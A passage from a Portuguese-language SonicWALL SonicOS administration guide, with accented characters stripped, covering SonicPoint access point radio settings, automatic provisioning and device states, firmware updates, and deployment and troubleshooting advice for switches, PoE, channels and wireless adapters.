2: Selecione 2 para restringir o SonicPoint para usar a antena 2 somente. De frente
para a parte traseira do SonicPoint, antena 2 direita, mais prxima porta do
console.
Intervalo de sinais (milsimos de segundo): Insira o nmero de milsimos de
segundo entre o envio de sinais sem fio.
Intervalo DTIM: Insira o intervalo em milissegundos.
Limite de fragmentao (bytes): Insira o nmero de bytes de dados fragmentados
que deseja permitir na rede.
Limite RTS (bytes): Insira o nmero de bytes.
Mximo de associaes de cliente: Insira o nmero mximo de clientes que voc
deseja que o SonicPoint suporte neste rdio de uma s vez.
Comprimento do prembulo: Selecione o comprimento do prembulo - o envio de
comunicao sem fio inicial ao associar um host sem fio. Voc pode selecionar Longo
ou Curto.
Modo de proteo: Selecione a proteo CTS ou RTS. Selecione Nenhum, Sempre
ou Automtico. Nenhum o padro.
Taxa de proteo: Selecione a velocidade para a proteo CTS ou RTS, 1 Mbps, 2
Mbps, 5 Mbps ou 11 Mbps.
Tipo de proteo: Selecione o tipo de proteo, Somente CTS ou RTS-CTS.
Delta de potncia CCK OFDM: Selecione a diferena na potncia de transmisso de
rdio que permitir entre os modos 802.11a e 802.11b: 0 dBm, 1 dBm ou 2 dBm.
Habilitar tempo de slot curto: Permita aos clientes desassociar e reassociar mais
rapidamente.

Permitir conexo apenas de clientes 802.11g: Use esta opo se voc estiver
usando o modo Turbo G e, portanto, no est permitindo que os clientes 802.11b se
conectem.
Etapa 5 Defina as configuraes nas guias Rdio 802.11a e 802.11a avanado. Essas configuraes
afetam a operao das faixas de rdio 802.11a. O SonicPoint tem dois rdios separados
incorporados. Portanto, ele pode enviar e receber em ambas bandas 802.11a e 802.11g ao
mesmo tempo.
As configuraes nas guias Rdio 802.11a e 802.11a avanado so semelhantes s
configuraes nas guias Rdio 802.11g e 802.11g avanado. Siga as instrues na etapa 3
e etapa 4 nesse procedimento para configurar o rdio 802.11a.
Quando uma unidade de SonicPoint se conecta pela primeira vez e ligada, ela ter uma
configurao padro de fbrica (Endereo IP 192.168.1.20, nome de usurio: admin, senha:
password). Na inicializao, ele tentar encontrar um dispositivo SonicOS com o qual parear.
Se no for possvel localizar um ponto de dispositivo SonicOS, ele entrar em um modo
independente de operao com uma configurao separada independente, permitindo que ele
opere como um Ponto de acesso padro.
Se o SonicPoint localizar ou for localizado por um dispositivo par SonicOS atravs do Protocolo
de descoberta do firewall, uma troca criptografada entre as duas unidades garantiro que o
perfil associado zona sem fio relevante seja usado para configurar (provisionar)
automaticamente a nova unidade adicionada do SonicPoint.
Como parte do processo de provisionamento, o SonicOS atribuir ao dispositivo SonicPoint

descoberto um nome exclusivo e ele registrar seu endereo MAC e a interface e zona em que
foi descoberto. Ele poder tambm atribuir automaticamente o SonicPoint a um Endereo IP,
se assim configurado, para que o SonicPoint se comunique com um servidor de autenticao
para suporte ao WPA-EAP. O SonicOS, em seguida, usar o perfil associado zona relevante
para definir as configuraes de rdio de 5 GHz e 2,4 GHz.
As modificaes aos perfis no afetaro as unidades que j foram provisionadas e esto em
um estado operacional. Alteraes de configurao para dispositivos SonicPoint operacionais
podem ocorrer de duas maneiras:
Via alteraes manuais da configurao Apropriada quando um nico ou um pequeno
conjunto de alteraes est para ser afetado, especialmente quando esse SonicPoint
individual requer configuraes diferentes do perfil associado sua zona.
Via desconfigurao Excluir uma unidade SonicPoint efetivamente desconfigura a
unidade ou limpa sua configurao e coloca-o em um estado onde ele ser
automaticamente colocado em contato com o processo de provisionamento novamente
com seu dispositivo par SonicOS. Essa tcnica til quando o perfil de uma zona
atualizado ou alterado e a alterao est definida para propagao. Ele pode ser usado
para atualizar o firmware no SonicPoints ou para atualizar de modo simples e automtico
vrias unidades SonicPoint de um modo controlado, em vez de alterar todos os
SonicPoints emparelhados ao mesmo tempo, o que pode causar interrupes no servio.

Atualizando configuraes do SonicPoint
Voc pode alterar as configuraes de qualquer lista SonicPoint individual na pgina
Sonicpoint > SonicPoints.
Editar configuraes do SonicPoint
Para editar as configuraes de um SonicPoint individual:
Etapa 1 Em Configuraes do SonicPoint, clique no cone Editar na mesma linha que o SonicPoint
que voc deseja editar.
Etapa 2 Na tela Editar SonicPoint, faa as alteraes que voc deseja. Consulte Configurando um perfil
SonicPoint na pgina 457 para obter instrues sobre como definir essas configuraes.
Etapa 3 Clique em OK para aplicar essas configuraes.
Sincronizar SonicPoints
Clique no boto Sincronizar SonicPoints na parte superior da pgina

SonicPoint > SonicPoints para emitir uma diretiva de consulta do SonicOS Zona WLAN
para que todos os SonicPoints conectados reportem suas configuraes e estatsticas atuais.
O SonicOS tambm tentar localizar a presena de quaisquer novos SonicPoints conectados
que ainda no estejam registrados com o firewall.
Habilitar e desabilitar SonicPoints individuais
Voc pode habilitar ou desabilitar SonicPoints individuais na pgina Sonicpoint >

SonicPoints.
Etapa 1 Marque a caixa embaixo de Ativar para ativar o SonicPoint, desmarque a caixa para desativ-
lo.
Etapa 2 Clique em Aceitar na parte de cima da pgina SonicPoint > SonicPoints para aplicar essa
configurao ao SonicPoint.
Aprimoramento de diagnsticos SonicPoint-N

Um SonicPoint pode coletar dados de tempo de execuo crticos e salv-los no
armazenamento persistente na Lista de mesmo nvel SonicPoint global. Se o SonicPoint
enfrentar uma falha, o recurso de aperfeioamento de diagnstico permite que o dispositivo de
gerenciamento do firewall recupere os dados de log quando o SonicPoint for reinicializado. Em
seguida, esses dados de log so incorporados no Relatrio de suporte tcnico (TSR). Para
obter mais informaes sobre TSR, consulte Relatrio do suporte tcnico na pgina 164.
Para ativar o recurso de aperfeioamento de diagnstico do SonicPoint-N, siga as etapas
listadas abaixo:

Etapa 1 Navegue at a pgina Sistema > Diagnsticos.
Etapa 2 Selecione a caixa de seleo Diagnsticos SonicPointN na seo Relatrio do suporte
tcnico.
Etapa 3 Clique em Aceitar. Em seguida, voc pode gerar um TSR com as informaes disponveis para
o Diagnstico do SonicPoint-N clicando no boto Baixar relatrio.
Nota Voc precisar re-sincronizar seu SonicPoint-N e dispositivo de gerenciamento do

SonicWALL para o Firmware SonicPoint mais recente para recuperar o Diagnstico do
SonicPoint-N mais recente.
Atualizando firmware do SonicPoint

Nem todos os firmwares SonicOS Enhanced contm uma imagem do firmware do SonicPoint.
Para verificar, role para a parte de baixo da pgina SonicPoint > SonicPoints e procure o link
Download.
Se o seu dispositivo SonicWALL tem conectividade com a Internet, ele far download
automaticamente da verso correta da imagem do SonicPoint no servidor de firewall quando
voc conectar um dispositivo SonicPoint.
Se o seu dispositivo SonicWALL no tiver acesso Internet ou tiver acesso somente atravs
de um servidor proxy, voc deve efetuar as seguintes etapas:
Etapa 1 Baixe a imagem SonicPoint de http://www.mysonicwall.com para um sistema local com acesso
Internet.
Voc pode baixar a imagem SonicPoint de um dos seguintes locais:
Na mesma pgina onde voc pode baixar o firmware SonicOS Enhanced
Na pgina Centro de Download, selecionando SonicPoint no menu suspenso Tipo
Etapa 2 Carregar a imagem do SonicPoint em um servidor Web local que pode ser acessado pelo seu
dispositivo SonicWALL.
Voc pode alterar o nome do arquivo de imagem SonicPoint, mas deve manter a extenso
intacta (ex: .bin.sig).
Etapa 3 Na interface de usurio SonicOS no seu dispositivo SonicWALL, no painel de navegao,
clique em Sistema e, em seguida, clique em Administrao.
Etapa 4 Na tela Sistema > Administrao, em URL de download, clique na caixa de seleo
Especificar manualmente o URL da imagem SonicPoint para ativ-lo.
Etapa 5 Na caixa de texto, digite o URL para o arquivo de imagem SonicPoint no seu servidor Web
local.
Nota Ao digitar o URL para o arquivo de imagem SonicPoint, NO inclua "http://" na caixa de
texto.

Provisionamento automtico (SDP & SSPP)
O Protocolo de descoberta do Dell SonicWALL (SDP) um protocolo de camada 2 empregado
pelo SonicPoints e dispositivos que executam o SonicOS Enhanced. SDP a base para o
provisionamento automtico de unidades SonicPoint via as seguintes mensagens:
Propaganda Dispositivos SonicPoint sem um ponto sero anunciados periodicamente e
na inicializao ou anunciam-se por meio de uma transmisso. O anncio ir incluir
informaes que sero usadas pelo dispositivo SonicOS de recepo para determinar o
estado do SonicPoint. O dispositivo SonicOS, em seguida, ir relatar o estado de todos os
SonicPoints com ponto e executar aes de configurao, conforme necessrio.
Descoberta Os dispositivos SonicOS periodicamente enviam transmisses de
solicitao de descoberta para despertar respostas de L2 conectadas unidades
SonicPoint.
Configurar diretiva Uma mensagem de unicast de um dispositivo SonicOS para uma
unidade especfica do SonicPoint para estabelecer chaves de criptografia para
provisionamento e para definir os parmetros de e para envolver o modo de configurao.
Configurar confirmao Uma mensagem de unicast de um SonicPoint para seu
dispositivo SonicOS com ponto, reconhecendo um Configurar diretiva.
Manuteno de atividade Uma mensagem de unicast de um SonicPoint para seu
dispositivo SonicOS com ponto usado para validar o estado do SonicPoint.
Se via a troca SDP o dispositivo SonicOS determina que o SonicPoint requer provisionamento
ou uma atualizao de configurao (por exemplo, ao calcular uma incompatibilidade de soma
de verificao ou quando uma atualizao de firmware estiver disponvel), Configurar diretiva
iniciar 3DES criptografado, confivel com base em canal TCP no Protocolo de
Provisionamento simples SonicWALL (SSPP). O dispositivo SonicOS, em seguida, envia a
atualizao para o SonicPoint por este canal e o SonicPoint ser reiniciado com a configurao
atualizada. Informaes de estado sero fornecidas pelo SonicPoint e podero ser
visualizadas no dispositivo SonicOS durante toda a descoberta e o processo de
provisionamento.
Estados do SonicPoint e SonicPointN

Dispositivos SonicPoint e SonicPointN podem funcionar e relatar os seguintes estados (em
todos os estados listados abaixo, SonicPoint refere-se a dispositivos SonicPoint e
SonicPointN):
Inicializando O estado quando um SonicPoint iniciado e se anuncia via SDP antes da
entrada em um modo independente ou operacional.
Operacional Uma vez que o SonicPoint tem pontos com um dispositivo SonicOS e tem
sua configurao validada, ele entrar em um estado operacional e estar pronto para
clientes.
Provisionamento Se a configurao do SonicPoint requer uma atualizao, o
dispositivo SonicOS iniciar um canal SSPP para atualizar o SonicPoint. Durante esse
processo breve, ele entrar no estado de provisionamento.
Modo de segurana O modo de segurana pode ser ativado pressionando o boto reset
ou do dispositivo de ponto SonicOS. Colocar um SonicPoint em Modo de segurana
retorna sua configurao para os padres, desabilita os rdios e desabilita SDP. O
SonicPoint, em seguida, deve ser reinicializado para entrar no modo independente ou em
algum outro estado funcional.
No respondente Se um dispositivo SonicOS perder comunicaes com um SonicPoint
com ponto anterior, ele reporta seu estado como no respondente. Ele permanecer nesse
estado at que as comunicaes sejam restauradas ou o SonicPoint seja excludo da
tabela do dispositivo SonicOS.

Atualizando firmware Se o dispositivo SonicOS detectar que possui uma atualizao de
firmware disponvel para um SonicPoint, ele usar SSPP para atualizar o firmware do
SonicPoint.
Fazendo download do firmware O dispositivo de segurana de rede Dell SonicWALL
est baixando o novo firmware do SonicPoint do URL configurado, que pode ser
personalizado pelo administrador. O URL padro http://software.sonicwall.com.
Falha de download O dispositivo de segurana de rede Dell SonicWALL no pode baixar
o firmware do SonicPoint do URL configurado.
Firmware de gravao Enquanto o SonicPoint est gravando o novo firmware para o
flash, o progresso exibido como uma porcentagem na interface de gerenciamento do
SonicOS no campo de status do SonicPoint.
Acima do limite excedido Por padro, at 2 dispositivos SonicPoint podem ser
anexados interface da zona Sem fio. Se mais de 2 unidades so detectadas, os
dispositivos acima do limite relataro um estado acima do limite e no entraro em um
modo operacional. O nmero pode ser reduzido de 2 conforme necessrio.
Reiniciando Aps uma atualizao de firmware ou configurao, o SonicPoint anunciar
que est prestes a reinicializar e ir, em seguida, fazer isso.
Falha de firmware Se uma atualizao de firmware falha, o SonicPoint reportar a falha
e, em seguida, ir reinicializar.
Falha de proviso No evento improvvel de que uma tentativa de provisionamento de
um dispositivo SonicOS falhar, o SonicPoint reportar a falha. Para no entrar em um loop
infinito, ele pode ser reinicializado manualmente, reconfigurado manualmente ou excludo
e provisionado novamente.
Modo independente (no reportado) Se um dispositivo SonicPoint no puder encontrar
ou ser encontrado por um dispositivo SonicOS de mesmo nvel, ele entrar em um modo
independente de operao. Isso ir envolver o GUI interno do SonicPoint (que est
desativado, caso contrrio) e permitir que ele seja configurado como um Ponto de acesso
convencional. Se, a qualquer momento, ele colocado no mesmo segmento de camada 2
que um dispositivo SonicOS que est enviando pacotes de descoberta, ele deixar o modo
independente e entrar em um modo gerenciado. A configurao independente ser
mantida.

Prticas recomendadas para implantao do
SonicPoint
Esta seo fornece recomendaes SonicWALL e prticas recomendadas sobre os problemas
de design, instalao, implantao e configurao para pontos de acesso sem fio SonicPoint
da SonicWALL. As informaes abordadas permitem que os administradores de site implantem
corretamente os SonicPoints em ambientes de qualquer porte. Esta seo tambm aborda
questes externas relacionadas que so necessrias para a implantao e a operao com
xito.
O SonicWALL no pode fornecer nenhum suporte tcnico direto para qualquer uma das opes
de Ethernet de terceiros mencionadas nesta seo. O material tambm est sujeito a
alteraes sem o conhecimento da SonicWALL quando o fabricante do comutador libera novos
modelos ou firmwares que podem invalidar as informaes aqui contidas. A nica exceo a
essa regra a Hewlett-Packard, pois a SonicWALL no momento membro do programa de
aliana ProCurve da HP e trabalha em conjunto com a HP para garantir a compatibilidade com
a linha de produtos comutadores ProCurve.
Mais informaes podem ser encontradas em:
http://h20195.www2.hp.com/v2/GetPDF.aspx/4AA1-9147ENUC.pdf
Informaes sobre prticas recomendadas so fornecidas nas sees a seguir:
Comutadores testados na pgina 475
Consideraes de fiao na pgina 475
Canais na pgina 476
PoE na pgina 477
rvore de abrangncia na pgina 478
VTP e GVRP na pgina 478
Agregao de porta na pgina 478
Transmisso de otimizao/tempestade de transmisso na pgina 478
Problemas com VAP na pgina 479
Reconfigurando o SonicPoint na pgina 480
Dicas de programao do comutador na pgina 481
Pr-requisitos
Para esta verso, necessrio o seguinte para uma implantao do SonicPoint com sucesso:
O SonicOS Enhanced requer acesso Internet pblico para o dispositivo UTM fazer
download e atualizar as imagens de firmware do SonicPoint. Se o dispositivo no tiver
acesso Internet pblico, voc precisar obter e baixar o firmware SonicPoint
manualmente.
Um ou mais pontos de acesso SonicWALL SonicPoint ou SonicPoint G sem fio.
Se voc estiver usando um comutador PoE para ligar o SonicPoint, ele deve ser compatvel
com o padro 802.3af Ethernet. Notas de programao de comutador especficas de
fornecedor podem ser encontradas no final dessa seo para HP, Cisco, Dell e D-Link.
Caso contrrio, ser necessrio usar o adaptador de energia que vem com o SonicPoint
ou Injetor de PoE da SonicWALL. Consulte:
http://www.sonicwall.com/downloads/SonicWALL_PoE_Injector_Users_Guide.pdf

altamente recomendvel que voc obtenha um contrato de suporte com a SonicWALL,
bem como o comutador PoE; isso permitir a atualizao para novas verses se forem
encontrados problemas no lado do comutador ou no lado do firewall ou quando novos
recursos so liberados.
Certifique-se realizar uma pesquisa de site completa antes da instalao (consulte a seo
a seguir).
Verifique o cabeamento e a infraestrutura de cabo para verificar se h conexo ponta a
ponta entre SonicPoints e se os comutadores so Ethernet CAT5, CAT5e ou CAT6.
Verifique os cdigos de construo para instalar pontos e trabalhar com uma equipe de
desenvolvimento de instalaes, uma vez que alguns pontos de instalao podem violar
as normas.
Comutadores testados
A maioria dos comutadores Cisco funcionam bem; no entanto, o SonicWALL no
recomenda a implantao de SonicPoints usando a linha de comutadores "Cisco Express".
O SonicWALL no recomenda a implantao de SonicPoints usando comutadores Netgear
PoE.
Se voc estiver usando comutadores PoE D-Link, ser necessrio desligar todos os
controles de transmisso proprietrios e mecanismos de controle de tempestade, uma vez
que eles interferiro nos mecanismos de provisionamento e aquisio no SonicPoint
(consulte a seo sobre isso).
Dell Certifique-se de configurar STP para o incio rpido em portas SonicPoint.
Extreme Certifique-se de configurar STP para o incio rpido em portas SonicPoint.
Foundry Certifique-se de configurar STP para o incio rpido em portas SonicPoint.
HP ProCurve Certifique-se de configurar STP para o incio rpido em portas SonicPoint.
Consideraes de fiao
Certifique-se de que o cabeamento CAT5, CAT5e ou CAT6 de ponta a ponta.
Devido a limitaes de sinalizao no 802.3, execues de cabo Ethernet no so
possveis a mais de 100 metros entre switch PoE e SonicPoint.
Voc precisa estar ciente da perda de energia do PoE conforme o cabo se torna mais
longo; isso pode chegar at 16%. Para cabeamentos mais longos, a porta exigir mais
energia.
Pesquisa de rea e planejamento

Caminhe por todas as reas em que os SonicPoints sero implantados com um scanner
de espectro sem fio; observe qualquer AP existente e os canais em que eles estiverem
transmitindo. O SonicWALL atualmente recomenda usar produtos Fluke ou AirMagnet para
realizar pesquisas totais de rea. Voc tambm poder experimentar o NetStumbler/
MiniStumbler, que, mesmo gratuitos, fazem um trabalho decente de pesquisa, pois
funciona com sua placa sem fio.
Plantas de planos de piso so teis; aqui voc pode marcar a posio de Pontos de acesso
e o intervalo da clula sem fio. Faa vrias cpias deles pois, durante a pesquisa de rea,
os resultados podem fazer com que o design original no seja o melhor e ser necessrio
comear um novo. Conforme voc v bem onde as paredes, corredores e elevadores esto
localizados, saber o que pode influenciar o sinal. Alm disso, reas nas quais os usurios
esto localizados e onde no - podem ser visualizadas. Durante a pesquisa de rea,
fique atento para equipamentos eltricos que podem causar interferncia (micro-ondas,

equipamentos de verificao CAT, etc...). Em reas onde h muitos equipamentos
eltricos, tambm d uma olhada no cabeamento que est sendo usado. Em reas com
uma grande quantidade de equipamentos eltricos, o UTP no deve ser usado e FTP ou
STP necessria.
Pesquise trs sinais dimensionalmente sem fio entre pavimentos diferentes.
Determine onde voc pode localizar pontos de acesso com base em energia e cabos.
Lembre-se de que voc no deve colocar PAs perto de metal ou paredes de concreto e que
voc deve coloc-los mais prximo ao teto possvel.
Use a ferramenta de varredura sem fio para verificar intensidades de sinal e rudo. O sinal
de rudo deve ser de pelo menos 10dB (requisitos mnimos para 11 Mbps), no entanto 20dB
a preferencial. Ambos fatores influenciam a qualidade do servio.
Realoque os pontos de acesso e teste novamente, dependendo dos resultados da sua
pesquisa.
Salve as configuraes, registros e anote o local do ponto de acesso para referncia futura.
Se voc achar que determinadas reas, ou todas as reas, esto saturadas com
sobreposies de canais 802.11b/g existentes, voc poder implantar SonicPoints usando
o rdio 802.11a. Isso fornece uma variedade muito maior de canais para transmitir, embora
o intervalo de 802.11a seja limitado e no permita ao SonicPoint adicionar antenas
externas (somente o modelo de SonicPoint G permite isso).
Ao planejar, certifique-se de que voc est ciente d a distncia do cabo que passa a partir
de onde o SonicPoint ser montado; este valor deve ser de 100 metros ou menos. Se voc
no estiver usando comutadores de PoE, voc tambm precisar ter cuidado com o
adaptador de energia ou Injetor PoE para o SonicPoint ou SonicPoint - G. Certifique-se de
que voc no est criando um risco eltrico ou de incndio.
Esteja ciente da transmisso do sinal sem fio em reas que voc no controla; Verifique
reas onde as pessoas podem ser capazes de alcanar o sinal e ajustar o SonicPoints
adequadamente.
Para uso leve, voc pode planejar de 15 a 20 usurios para cada SonicPoint. Para uso
comercial, voc pode planejar de 5 a 10 usurios para cada SonicPoint.
Planeje adequadamente para usurios mveis isso precisar de ajuste da energia em
cada SonicPoint para que a sobreposio de sinal seja mnima. Vrios SonicPoints
transmitindo o mesmo SSID em reas com sobreposio significativa pode causar
problemas de conectividade de cliente contnuos.
Use o recurso de agendamento do SonicOS Enhanced para desligar os SonicPoints
quando no estiverem em uso isso recomendvel se voc no operar seu SonicPoint
durante horrios no comerciais (desativar noite e fins de semana).
Canais
A configurao padro do SonicPoints canal automtico. Quando definido, na inicializao o
SP ir fazer uma verificao e checar se h outros dispositivos sem fio transmitindo. Em
seguida, ele tentar localizar um canal no utilizado e us-lo para transmisso. Especialmente
em implantaes maiores, isso pode causar problemas. Aqui, recomendvel atribuir canais
fixos a cada SonicPoint. Um diagrama de SPs e Endereos MAC ajudam a evitar
sobreposies, e o melhor marcar o local do SPs e endereos MAC em uma planta.
Ajuste de placa sem fio

Se voc estiver enfrentando problemas de conectividade com laptops, verifique se o laptop tem
um adaptador sem fio incorporado da Intel. Os seguintes chipsets Intel so publicamente
conhecidos e reconhecidos por problemas de desconexo com pontos de acesso sem fio de
terceiros, como o Dell SonicWALL SonicPoint e SonicPoint-g:

Intel PRO/Wireless 2100 Network Connection
Intel PRO/Wireless 2100A Network Connection
Intel PRO/Wireless 2200BG Network Connection
Intel PRO/Wireless 2915ABG Network Connection
Intel PRO/Wireless 3945ABG Network Connection
Essas placas sem fio so fornecidas para fabricantes de OEM de laptop e muitas vezes
remarcadas com o nome de outros fabricantes por exemplo, ambas Dell e IBM usam as
placas sem fio acima, mas os drivers so da marca em seu prprio nome.
Para identificar o adaptador, v para o site de suporte da Intel e realize uma pesquisa em
Ferramenta de identificao de Conexo de Rede Intel. Instale e execute essa ferramenta
em qualquer laptop enfrentando problemas frequentes de desconexo sem fio. A ferramenta
identificar o adaptador Intel instalado no laptop.
Uma vez que voc identificou o adaptador sem fio Intel, v para o site de suporte da Intel e
faa download do pacote de software mais recente para o adaptador recomendvel que
voc baixe e instale o pacote Intel PRO/Set e permita que ele gerencie a placa sem fio e no
o Windows ou qualquer programa de gerenciamento de rede sem fio fornecida pelo OEM
usado anteriormente. O SonicWALL recomenda que voc use a verso 10.5.2.0 ou mais
recente do gerenciador/driver Intel PRO/Set Sem fio.
Certifique-se de usar o utilitrio de gerenciamento sem fio Intel e desativar o servio de
gerenciamento Microsofts Wireless Zero Config o utilitrio Intel deve controlar a placa, no
o sistema operacional.
Na seo 'Avanado', desabilite o gerenciamento de energia, desmarcando a caixa ao lado de
'Usar valor padro' e, em seguida, mova a barra deslizante abaixo dele para 'Mais alta'. Isso
faz com que a placa sem fio opere em intensidade total e no entre no modo de suspenso.
Quando terminar, clique no boto 'OK' para salvar e ativar a alterao. Reinicialize o
computador.
Na seo 'Avanado', ajuste a agressividade de roaming desmarcando a caixa ao lado de 'Usar
valor padro' e, em seguida, mover a barra deslizante abaixo dele para 'Mais baixo'. Isso faz
com que a placa sem fio fique presa ao ponto de acesso associado enquanto possvel e efetue
roam somente se o sinal estiver significativamente degradado. Isso extremamente til em
ambientes com um grande nmero de pontos de acesso transmitindo o mesmo SSID. Quando
terminar, clique no boto 'OK' para salvar e ativar a alterao. Reinicialize o computador.
Se voc continuar a ter problemas, voc tambm pode tentar ajustar o Modo de prembulo da
placa sem fio. Por padro, as placas sem fio Intel acima esto definidas como 'auto'. Todos os
produtos sem fio SonicWALL por padro esto definidos para usar um prembulo 'Longo',
embora isso possa ser ajustado da GUI de Gerenciamento. Para ajustar a configurao de
prembulo da placa sem fio Intel, v para a seo 'Avanado' e desmarque a caixa ao lado de
'Usar valor padro' e selecione 'Prembulo Tx Longo' na lista suspensa abaixo dela. Quando
terminar, clique no boto 'OK' para salvar e ativar a alterao. Reinicialize o computador.
PoE
Um SonicPoint em energia plena utiliza 6 a 10 Watts.
SonicPoints esto definidos como classe 0 PD (ou seja, que pode ser 0,44W no mnimo e
at 12,95W no mximo). Uma incompatibilidade na classe ir causar confuso no
handshake e reinicializar o SonicPoint.
A conformidade total com 802.3af necessria em todos os comutadores que fornecero
PoE a um SonicPoint ou SonicPoint-G. No opere SonicPoints ou comutadores no
compatveis, pois o SonicWALL no oferece suporte a eles.

Desative a deteco da especificao pr-802.3af pois ela pode causar problemas de
conectividade.
Cabos longos causam a perda de energia; 100 metros entre o SonicPoint e o comutador
PoE pode causar a degradao do sinal de energia/sinal em 16%. Por isso, o comutador
PoE precisar fornecer mais potncia para a porta para manter o SonicPoint operacional.
Por isso, verifique se cada porta pode obter 10 Watts garantidos, se possvel, e defina a
prioridade de PoE como crtico ou alto.
Uma coisa que se deve ter cuidado ao planejar que nem todos os comutadores PoE
podem fornecer os 15,4 watts de energia para cada uma das portas PoE ela pode ter 24,
mas, na verdade, no pode ter todas as portas com dispositivos PoE conectados sem a
adio de uma fonte de alimentao redundante externa. Voc precisar trabalhar em
conjunto com o fabricante do comutador PoE para garantir que a potncia suficiente seja
fornecida para o comutador para alimentar todos os dispositivos PoE.
rvore de abrangncia
Quando uma porta Ethernet fica eletricamente ativa, a maioria dos comutadores por
padro ativar o protocolo de rvore de abrangncia na porta para determinar se h loops
na topologia da rede. Durante esse perodo de deteco de 50 a 60 segundos, no passa
nenhum trfego pela porta esse recurso conhecido por causar problemas com
SonicPoints. Se voc no precisa da rvore de abrangncia, desative-a globalmente no
comutador ou desabilite-a em cada porta conectada a um dispositivo SonicPoint.
Se isso no for possvel, verifique com o fabricante do comutador para determinar se eles
permitem para "deteco rpida de rvore de abrangncia", que um mtodo que executa
a rvore de abrangncia em um menor tempo para no causar problemas de
conectividade. Consulte as sees especficas do comutador no final desta nota tcnica
para exemplos de programao sobre como fazer isso.
VTP e GVRP
Desative esses protocolos de truncamento em portas conectadas diretamente a SonicPoints,
j que eles so conhecidos por causar problemas com SonicPoints especialmente os
comutadores da srie Cisco Catalyst de ponta.
Agregao de porta
Muitos comutadores tm agregao de portas ativada por padro isso causa muitos
problemas e
deve ser desativado em portas conectadas diretamente em SonicPoints.
EtherChannel/PAGP/Fast EtherChannel desative essa opo nas portas para
SonicPoints.
LACP desative essa opo nas portas para o SonicPoints.
Transmisso de otimizao/tempestade de transmisso

Esse recurso um problema em alguns comutadores, especialmente D-Link. Desative em uma
base por porta, se possvel, se no, desabilite globalmente.

Velocidade e Duplex
No momento, a negociao automtica de velocidade e duplex a nica opo para
SonicPoints.
Bloqueie a velocidade e duplex no comutador e reinicialize o SonicPoint isso pode ajudar
com problemas de conectividade.
Verifique a porta para erros, j que esta a melhor maneira de determinar se h um
problema de duplex (a porta tambm enfrentar transferncia degradada).
Solucionando problemas de SonicPoints antigos

Se voc tiver um SonicPoint mais antigo e ele estiver consistentemente oscilando a porta, no
desliga ou est preso no ciclo de reinicializao ou relatrios na GUI esto presos no
provisionamento, verifique se voc est executando uma verso atual do firmware e do
dispositivo UTM que tem acesso internet pblica. Voc precisar de RMA para um SonicPoint
mais recente.
Problemas com VAP

Ser necessrio ajustar manualmente o tempo de transmisso/sinal ao usar vrios SSIDs,
se usando verses do SonicOS Enhanced mais antigos que 4.0.1.0 (definir sinal para 800).
Somente plataformas suportadas pelo VLAN do SonicWALL podem oferecer recursos VAP
para verses existentes. Cada SSID deve ser associado ID de VLAN exclusiva para
trfego de segmentos em domnios diferentes de difuso. Pacotes do protocolo SDP/SSPP
devem ser desmarcados antes de atingir a interface WLAN SonicWALL ou SonicPoint.
A opo entre SonicPoint e SonicWALL deve ser configurada corretamente para permitir
tanto o trfego SDP/SSPP desmarcado quanto marcado com a ID de VLAN para cada
SSID VAP.
Se for possvel, atribua cada VAP sua prpria Zona de segurana\VLAN isso ir
fornecer segurana mxima e, embora no explicitamente necessrio para conformidade
com PCI, coloca voc solidamente na zona "verde".
Se voc usar VLAN, no use a interface pai e no use o VLAN padro.
Soluo de problemas
Ao criar um zona Sem fio e uma interface, certifique-se de configurar a interface para o
nmero de SonicPoints que voc deseja dar suporte -- novas interfaces esto definidas
para Sem SonicPoints' por padro. Se voc no fizer isso, o dispositivo UTM no criar o
escopo DHCP necessrio e no adquirir qualquer SonicPoints adicionado interface.
Se voc adicionou SonicPoints e somente um certo nmero foi detectado e adquirido,
verifique as configuraes de interface conforme descrito acima, pois ela pode estar
definida para menos SonicPoints.
Se a taxa de transferncia parecer lenta, verifique quantos SonicPoints voc tiver em uma
interface em grandes implantaes, aconselhvel espalh-los por mais de um. Tente
limitar as interfaces para uma taxa de excesso de assinatura de 4-para-1. Por exemplo, se
voc tiver 100 Mbps, voc com segurana pode anexar at 20 SonicPoints a ele e esperar
um desempenho razovel.
A velocidade de processamento fornecida em SonicPoints de apenas 20 a 22 Mbps no
mximo esta uma limitao de 802.11a e 802.11g, e no do SonicPoint.
Se voc ainda estiver com problemas de velocidade de processamento, atualize para o
SonicOS 4.0.1.0 ou mais recente, pois ela contm vrias correes que iro ajud-lo.

Certifique-se de que sua zona de segurana (o WLAN padro ou sua prpria zona sem fio
personalizada) possui as configuraes corretas eles podem estar bloqueando o trfego
por vrios motivos.
Se no estiverem adquirindo os SonicPoints, verifique os escopos DHCP; eles podem
estar desativado ou totalmente ausentes.
NO recomendvel usar o mesmo SSID para rdios 802.11bg e 802.11a, pois os clientes
com placas de banda tripla podem experimentar problemas de desconexo nomeie-os
separadamente.
Preso no modo de provisionamento? Desconecte, limpe do config, reinicialize e conecte
novamente.
Todas as verses do SonicOS Enhanced aps a verso 3.5 no contm a imagem de
firmware do SonicPoint e, para que um SonicPoint seja descoberto e configurado, o
dispositivo UTM deve estar conectado Internet.
Observe que os SonicPoints tem um 'Modo independente' em que eles faro a transio
se no conseguirem encontrar um dispositivo SonicWALL UTM. Se voc tiver mais de um
SonicPoint, poder ter problemas, j que todos os SonicPoints sero revertidos para o
mesmo endereo IP padro de 192.168.1.20/24.
Ao solucionar problemas sem fio, SNMP, Syslog, registro em log e SNMP so seu amigos
o pacote do Sistema de Gerenciamento Global (GMS) da SonicWALL pode centralizar
todos esses para todos os seus dispositivos SonicWALL, independentemente do local.
Uma alternativa livre o Daemon Syslog da Kiwi, que pode aceitar fluxos de Syslog e
capturas SNMP de todos os dispositivos SonicWALL UTM. A verso mais atual pode ser
encontrada aqui: http://www.kiwisyslog.com/
Verifique o cabeamento de rede. Cabo de TP blindado ou no blindado est sendo usado?
Reconfigurando o SonicPoint
O SonicPoint tem um comutador de redefinio dentro de um pequeno orifcio na parte
posterior da unidade, ao lado da porta do console. Voc pode redefinir o SonicPoint a qualquer
momento, pressionando a opo de redefinir com um clipe de papel aberto, um palito de dente
ou outro objeto estreito e pequeno.
O boto Redefinir redefine a configurao em que o SonicPoint est operando para os padres
de fbrica. Ele no redefine a configurao para outro modo. Dependendo do modo que o
SonicPoint est operando e a quantidade de tempo que voc pressionar o boto Redefinir, o
SonicPoint se comporta em uma das seguintes formas:
Pressione o boto Redefinir por pelo menos trs segundos e menos de oito segundos
com o SonicPoint operando no Modo gerenciado para redefinir a configurao de Modo
gerenciado para os padres de fbrica e reinicializar o SonicPoint.
